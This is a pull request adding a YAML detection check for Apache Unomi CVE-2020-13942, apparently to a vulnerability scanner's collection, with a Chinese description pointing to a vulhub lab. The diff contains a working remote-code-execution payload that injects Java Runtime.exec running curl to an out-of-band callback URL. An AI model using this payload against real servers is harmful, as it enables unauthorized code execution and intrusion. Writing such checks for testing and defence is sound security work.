### PR TITLE
add poc apache unomi cve-2020-13942

### DIFF
--- a/pocs/apache-unomi-cve-2020-13942-rce.yml
+++ b/pocs/apache-unomi-cve-2020-13942-rce.yml
@@ -16,5 +16,5 @@ rules:
 detail:
   author: moonD4rk(https://github.com/moonD4rk/)
   links:
-    - https://www.ddosi.com/b520/
+    - https://github.com/vulhub/vulhub/tree/master/unomi/CVE-2020-13942
     - https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/

--- a/pocs/apache-unomi-cve-2020-13942-rce.yml
+++ b/pocs/apache-unomi-cve-2020-13942-rce.yml
@@ -1,0 +1,20 @@
+name: poc-yaml-apache-unomi-cve-2020-13942-rce
+set:
+  r1: randomLowercase(8)
+  reverse: newReverse()
+  reverseURL: reverse.url
+rules:
+  - method: POST
+    path: /context.json
+    headers:
+      Content-Type: application/json
+    body: >-
+      {"filters":[{"id":"{{r1}}","filters":[{"condition":{"parameterValues":{"":"script::Runtime r = Runtime.getRuntime(); r.exec(\"curl {{reverseURL}}\");"},"type":"profilePropertyCondition"}}]}],"sessionId":"{{r1}}"}
+    follow_redirects: true
+    expression: |
+      response.status == 200 && reverse.wait(10) && response.body.bcontains(bytes(r1))
+detail:
+  author: moonD4rk(https://github.com/moonD4rk/)
+  links:
+    - https://www.ddosi.com/b520/
+    - https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/


### PR DESCRIPTION
----------

## 本 poc 是检测什么漏洞的
apache unomi cve-2020-13942 任意代码执行漏洞

## 测试环境

https://github.com/vulhub/vulhub/tree/master/unomi/CVE-2020-13942

## 备注

<img width="802" alt="Screen Shot 2020-11-22 at 05 00 45" src="https://user-images.githubusercontent.com/24284231/99887478-b3909d80-2c7f-11eb-87d8-5b108e2defcf.png">

